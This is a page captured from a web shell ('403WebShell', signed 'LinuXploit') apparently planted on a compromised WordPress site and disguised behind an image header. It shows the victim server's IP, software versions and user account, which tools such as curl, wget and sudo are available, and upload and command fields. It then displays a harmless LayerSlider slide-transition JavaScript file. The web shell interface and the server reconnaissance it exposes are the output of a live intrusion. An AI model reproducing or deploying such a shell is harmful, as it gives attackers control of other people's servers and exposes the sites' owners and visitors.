????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.227
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.astacus.eu/wp-content/plugins/LayerSlider/demos/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.astacus.eu/wp-content/plugins/LayerSlider/demos/transitions.js
var layerSliderCustomTransitions = {
    "t2d" : [
 
        {
            "name" : "Sliding from right",
            "rows" : 1,
            "cols" : 1,
            "tile" : {
                "delay" : 0,
                "sequence" : "forward"
            },
            "transition" : {
                "type" : "slide",
                "easing" : "easeInOutQuart",
                "duration" : 1500,
                "direction" : "left"
            }
        },
 
        {
            "name" : "Smooth fading from right",
            "rows" : 1,
            "cols" : 35,
            "tile" : {
                "delay" : 25,
                "sequence" : "reverse"
            },
            "transition" : {
                "type" : "fade",
                "easing" : "linear",
                "duration" : 750,
                "direction" : "left"
            }
        },
 
        {
            "name" : "Sliding random tiles to random directions",
            "rows" : [2,4],
            "cols" : [4,7],
            "tile" : {
                "delay" : 50,
                "sequence" : "random"
            },
            "transition" : {
                "type" : "slide",
                "easing" : "easeOutQuart",
                "duration" : 500,
                "direction" : "random"
            }
        },
 
        {
            "name" : "Fading tiles col-forward",
            "rows" : [2,4],
            "cols" : [4,7],
            "tile" : {
                "delay" : 30,
                "sequence" : "col-forward"
            },
            "transition" : {
                "type" : "fade",
                "easing" : "easeOutQuart",
                "duration" : 1000,
                "direction" : "left"
            }
        },
 
        {
            "name" : "Fading and sliding columns to bottom (forward)",
            "rows" : 1,
            "cols" : [12,16],
            "tile" : {
                "delay" : 75,
                "sequence" : "forward"
            },
            "transition" : {
                "type" : "mixed",
                "easing" : "easeInOutQuart",
                "duration" : 600,
                "direction" : "bottom"
            }
        }
    ],
 
    "t3d" : [
 
        {
            "name" : "Turning cuboid to right (90°)",
            "rows" : 1,
            "cols" : 1,
            "tile" : {
                "delay" : 75,
                "sequence" : "forward"
            },
            "animation" : {
                "transition" : {
                    "rotateY" : 90
                },
                "easing" : "easeInOutQuart",
                "duration" : 1500,
                "direction" : "horizontal"
            }
        },
 
        {
            "name" : "Vertical spinning rows random (540°)",
            "rows" : [3,7],
            "cols" : 1,
            "tile" : {
                "delay" : 150,
                "sequence" : "random"
            },
            "animation" : {
                "transition" : {
                    "rotateX" : -540
                },
                "easing" : "easeInOutBack",
                "duration" : 2000,
                "direction" : "vertical"
            }
        },
 
        {
            "name" : "Scaling and spinning columns to left (180°)",
            "rows" : 1,
            "cols" : [7,11],
            "tile" : {
                "delay" : 75,
                "sequence" : "reverse"
            },
            "before" : {
                "enabledd" : true,
                "transition" : {
                    "scale3d" : ".85"
                },
                "duration" : 600,
                "easing" : "easeOutBack"
            },
            "animation" : {
                "transition" : {
                    "rotateY" : -180
                },
                "easing" : "easeInOutBack",
                "duration" : 1000,
                "direction" : "horizontal"
            },
            "after" : {
                "enabled" : true,
                "transition" : {
                    "delay" : 200
                },
                "easing" : "easeOutBack",
                "duration" : 600
            }
        },
 
        {
            "name" : "Scaling and horizontal spinning cuboids random (180°, large depth)",
            "rows" : [2,4],
            "cols" : [4,7],
            "tile" : {
                "delay" : 75,
                "sequence" : "random",
                "depth" : "large"
            },
            "before" : {
                "enabled" : true,
                "transition" : {
                    "scale3d" : ".65"
                },
                "duration" : 700,
                "easing" : "easeInOutQuint"
            },
            "animation" : {
                "transition" : {
                    "rotateY" : 180
                },
                "easing" : "easeInOutBack",
                "duration" : 700,
                "direction" : "horizontal"
            },
            "after" : {
                "enabled" : true,
                "duration" : 700,
                "easing" : "easeInOutBack"
            }
        },
 
        {
            "name" : "Scaling and spinning rows to right (180°)",
            "rows" : [5,9],
            "cols" : 1,
            "tile" : {
                "delay" : 75,
                "sequence" : "forward"
            },
            "before" : {
                "enabled" : true,
                "transition" : {
                    "scale3d" : ".85"
                },
                "duration" : 600,
                "easing" : "easeOutBack"
            },
            "animation" : {
                "transition" : {
                    "rotateY" : 180
                },
                "easing" : "easeInOutBack",
                "duration" : 1000,
                "direction" : "horizontal"
            },
            "after" : {
                "enabled" : true,
                "transition" : {
                    "delay" : 200
                },
                "easing" : "easeOutBack",
                "duration" : 600
            }
        }
    ]
};

Youez - 2016 - github.com/yon3zu
LinuXploit